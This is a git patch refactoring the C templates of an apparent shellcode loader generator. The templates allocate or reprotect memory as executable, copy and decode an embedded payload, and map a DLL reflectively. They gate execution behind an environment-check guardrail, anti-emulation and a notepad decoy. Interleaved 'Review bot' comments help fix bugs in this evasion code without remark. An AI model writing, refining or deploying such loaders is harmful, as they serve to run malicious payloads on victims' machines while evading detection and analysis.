From b5641214e2978b070f7a265504d35e3e7cf77f20 Mon Sep 17 00:00:00 2001 From: Dobin Rutishauser Date: Mon, 17 Jun 2024 05:52:56 +0200 Subject: [PATCH] refactor: fix carrier & templates (modularize) --- data/source/carrier/alloc_rw_rwx/template.c | 37 ++++++------------- data/source/carrier/alloc_rw_rx/template.c | 28 +++++++------- data/source/carrier/change_rwx_rx/template.c | 18 +++++++++ .../carrier/dll_loader_alloc/template.c | 22 ++++++++++- .../carrier/dll_loader_change/template.c | 35 ++++++++++-------- data/source/decoy/none.c | 4 ++ data/source/decoy/winexec.c | 5 ++- data/source/guardrails/env.c | 20 +++++++++- data/source/guardrails/none.c | 3 ++ phases/templater.py | 2 +- 10 files changed, 116 insertions(+), 58 deletions(-) diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c index 76cadac..8239785 100644 --- a/data/source/carrier/alloc_rw_rwx/template.c +++ b/data/source/carrier/alloc_rw_rwx/template.c @@ -17,28 +17,25 @@ char *supermega_payload; {{plugin_antiemulation}} +{{plugin_decoy}} + +{{plugin_executionguardrail}} + int main() { - // Execution Guardrail: Env Check - wchar_t envVarName[] = L"USERPROFILE"; - wchar_t tocheck[] = L"C:\\Users\\"; - WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency! - DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024); - if (result == 0) { - return 6; - } - if (mystrcmp(buffer, tocheck) != 0) { - return 6; + DWORD result; + + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; } - // Depends on plugin_antiemulation + // Call: Anti Emulation plugin antiemulation(); - // Decoy - {{plugin_decoy}} - - //WinExec("C:\\windows\\system32\\notepad.exe", 1); + // Call: Decoy plugin + decoy(); // Allocate 1 // char *dest = ... 
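Review bot: `DWORD result;` is added at the top of the new main() body in alloc_rw_rwx/template.c but nothing in this hunk uses it; the old code needed it for GetEnvironmentVariableW, and that call has moved into executionguardrail(). main() continues past the end of the hunk, so if the rest of the body does use it a one-line comment on the declaration saying what it receives would help a reader of this prologue, and if it does not, drop the declaration. The same unused-looking declaration is added in the alloc_rw_rx/template.c hunk for the same function. The guardrail / anti-emulation / decoy call sequence is now repeated verbatim in all five carrier templates, so any change to it has to be made five times; consider emitting that prologue from one shared snippet in templater.py.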
@@ -62,13 +59,3 @@ int main() return 0; } -int mystrcmp(wchar_t* str1, wchar_t* str2) { - int i = 0; - while (str1[i] != L'\0' && str2[i] != L'\0') { - if (str1[i] != str2[i]) { - return 1; - } - i++; - } - return 0; -} diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c index 04dccd4..4723cc4 100644 --- a/data/source/carrier/alloc_rw_rx/template.c +++ b/data/source/carrier/alloc_rw_rx/template.c @@ -11,6 +11,11 @@ char *supermega_payload; {{plugin_antiemulation}} +{{plugin_decoy}} + +{{plugin_executionguardrail}} + + /* iat_reuse_rx Standard IAT reuse shellcode @@ -20,11 +25,18 @@ char *supermega_payload; int main() { - // Depends on plugin_antiemulation + DWORD result; + + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; + } + + // Call: Anti Emulation plugin antiemulation(); - // Decoy - {{plugin_decoy}} + // Call: Decoy plugin + decoy(); // Allocate 1 // char *dest = ... @@ -48,13 +60,3 @@ int main() return 0; } -int mystrcmp(wchar_t* str1, wchar_t* str2) { - int i = 0; - while (str1[i] != L'\0' && str2[i] != L'\0') { - if (str1[i] != str2[i]) { - return 1; - } - i++; - } - return 0; -} diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c index 5251a73..8ffc5bb 100644 --- a/data/source/carrier/change_rwx_rx/template.c +++ b/data/source/carrier/change_rwx_rx/template.c @@ -15,11 +15,29 @@ char *supermega_payload; * does (rw/rx) -> rwx -> rx */ +{{plugin_antiemulation}} + +{{plugin_decoy}} + +{{plugin_executionguardrail}} + + int main() { DWORD result; char *dest = supermega_payload; + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; + } + + // Call: Anti Emulation plugin + antiemulation(); + + // Call: Decoy plugin + decoy(); + // Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // can do only RW otherwise? for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { 
diff --git a/data/source/carrier/dll_loader_alloc/template.c b/data/source/carrier/dll_loader_alloc/template.c index 4df2b7b..f015eec 100644 --- a/data/source/carrier/dll_loader_alloc/template.c +++ b/data/source/carrier/dll_loader_alloc/template.c @@ -143,9 +143,29 @@ DWORD_PTR load_dll(LPVOID dllBytes, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) { } +{{plugin_antiemulation}} + +{{plugin_decoy}} + +{{plugin_executionguardrail}} + + int main() { - char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE); + char* dest = NULL; + + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; + } + + // Call: Anti Emulation plugin + antiemulation(); + + // Call: Decoy plugin + decoy(); + + dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE); // FROM supermega_payload[] // TO dest[] diff --git a/data/source/carrier/dll_loader_change/template.c b/data/source/carrier/dll_loader_change/template.c index 9fb9c63..0e4f3e8 100644 --- a/data/source/carrier/dll_loader_change/template.c +++ b/data/source/carrier/dll_loader_change/template.c @@ -122,8 +122,6 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) { for (DWORD i = 0; i < relocationsCount; i++) { relocationsProcessed += sizeof(BASE_RELOCATION_ENTRY); - - // THIZ if (relocationEntries[i].Type == 0) { continue; 
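Review bot: The VirtualAlloc call that the dll_loader_alloc hunk moves below the plugin calls still passes the allocation type as the magic literal `0x3000`; writing it as `MEM_COMMIT | MEM_RESERVE` makes the line self-describing next to the already-named PAGE_EXECUTE_READWRITE argument. `dest` is now initialised to NULL and then unconditionally overwritten a few lines later, which reads as if the early declaration exists only so the plugin calls run first — a comment stating that intent would save the next reader the guess. The copy into `dest` starts after the end of the hunk.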
@@ -134,15 +132,11 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) { //ReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL); DWORD_PTR* addressToPatch = (DWORD_PTR*)((BYTE*)dllBase + relocationRVA); //DWORD_PTR value = *addressToPatch; - *addressToPatch += deltaImageBase; //mymemcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR)); - } } - MessageBoxW(0, L"AAA2", L"AAA2", MB_OK); - // resolve import address table PIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL; IMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; @@ -187,26 +181,35 @@ DWORD_PTR load_dll(LPVOID dllBase, DWORD_PTR *ret_dllBase, DWORD *ret_aoep) { } +{{plugin_antiemulation}} + +{{plugin_decoy}} + +{{plugin_executionguardrail}} + + int main() { - // char* dest = VirtualAlloc(0, {{PAYLOAD_LEN}}, 0x3000, PAGE_EXECUTE_READWRITE); - //char* dest = VirtualAlloc(0, 0x7000, 0x3000, PAGE_EXECUTE_READWRITE); char* dest = supermega_payload; DWORD protect, oldProtect; - protect = PAGE_EXECUTE_READWRITE; - VirtualProtect((LPVOID)dest, 0x7000, protect, &oldProtect); - MessageBoxW(0, L"ok virtualprotect", L"AAA2", MB_OK); + // Call: Execution Guardrail + if (executionguardrail() != 0) { + return 1; + } + // Call: Anti Emulation plugin + antiemulation(); + + // Call: Decoy plugin + decoy(); + + VirtualProtect((LPVOID)dest, 0x7000, PAGE_EXECUTE_READWRITE, &oldProtect); // FROM supermega_payload[] // TO dest[] // Including decryption -{{ plugin_decoder }} - - - MessageBoxW(0, L"ok copy", L"AAA2", MB_OK); - + {{ plugin_decoder }} // Load the DLL at dest DWORD_PTR dllBase; diff --git a/data/source/decoy/none.c b/data/source/decoy/none.c index e69de29..1e28abf 100644 --- a/data/source/decoy/none.c +++ b/data/source/decoy/none.c @@ -0,0 +1,4 @@ + +void decoy() { + // None +} \ No newline at end of file 
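Review bot: In the third dll_loader_change hunk `DWORD protect, oldProtect;` is kept although the hunk removes the only assignment to `protect` and passes PAGE_EXECUTE_READWRITE to VirtualProtect directly, so `protect` is now an unused variable; change the declaration to `DWORD oldProtect;`. The re-indented `{{ plugin_decoder }}` placeholder now sits inside the function body like the other plugin calls, which is consistent with the new layout. main() continues past the end of the hunk.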
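Review bot: The new `void decoy()` in decoy/none.c is written with an empty parameter list, which in C is an old-style declaration with unspecified parameters rather than a prototype; `void decoy(void)` states the contract explicitly. The same applies to `void decoy()` in decoy/winexec.c and `int executionguardrail()` in guardrails/env.c and guardrails/none.c. The file also lacks a trailing newline.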
diff --git a/data/source/decoy/winexec.c b/data/source/decoy/winexec.c index 2519f91..99904c6 100644 --- a/data/source/decoy/winexec.c +++ b/data/source/decoy/winexec.c @@ -1 +1,4 @@ -WinExec("C:\\windows\\system32\\notepad.exe", 1); \ No newline at end of file + +void decoy() { + WinExec("C:\\windows\\system32\\notepad.exe", 1); +} diff --git a/data/source/guardrails/env.c b/data/source/guardrails/env.c index 17741f8..d98755c 100644 --- a/data/source/guardrails/env.c +++ b/data/source/guardrails/env.c @@ -1,3 +1,18 @@ + + +int mystrcmp(wchar_t* str1, wchar_t* str2) { + int i = 0; + while (str1[i] != L'\0' && str2[i] != L'\0') { + if (str1[i] != str2[i]) { + return 1; + } + i++; + } + return 0; +} + + +int executionguardrail() { // Execution Guardrail: Env Check wchar_t envVarName[] = L"USERPROFILE"; wchar_t tocheck[] = L"C:\\Users\\"; @@ -8,4 +23,7 @@ } if (mystrcmp(buffer, tocheck) != 0) { return 6; - } \ No newline at end of file + } + return 0; +} + diff --git a/data/source/guardrails/none.c b/data/source/guardrails/none.c index e69de29..aa67afe 100644 --- a/data/source/guardrails/none.c +++ b/data/source/guardrails/none.c @@ -0,0 +1,3 @@ +int executionguardrail() { + // None +} \ No newline at end of file diff --git a/phases/templater.py b/phases/templater.py index 44c0185..e76da2b 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -67,7 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int): 'plugin_decoder': plugin_decoder, 'plugin_antiemulation': plugin_antiemualation, 'plugin_decoy': plugin_decoy, - 'plugin_guardrails': plugin_guardrails, + 'plugin_executionguardrail': plugin_guardrails, 'PAYLOAD_LEN': payload_len, }) with open(settings.main_c_path, "w", encoding='utf-8') as file:
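Review bot: `mystrcmp` in guardrails/env.c returns 0 as soon as either string reaches its terminator, so it is a prefix comparison rather than the full equality its name suggests; now that it lives as a standalone helper in this file instead of a private function of one template, it needs a comment saying so, e.g. `// Prefix compare: returns 0 when the shorter of str1/str2 is a prefix of the other, 1 at the first mismatch. NOT a full strcmp.` executionguardrail() also keeps `return 6` from when that value was main()'s exit code, while every caller now only tests for non-zero; either a comment explaining the 6 or a plain `return 1;` would make the value look intentional.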
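Review bot: `int executionguardrail()` in guardrails/none.c has no return statement, and every carrier template now evaluates its result (`if (executionguardrail() != 0) return 1;`), so the "none" guardrail yields an indeterminate value — undefined behaviour in C, and in practice whatever happens to be in the return register — meaning the carrier may exit at that check depending on the build. Add `return 0;` before the closing brace. The file also lacks a trailing newline.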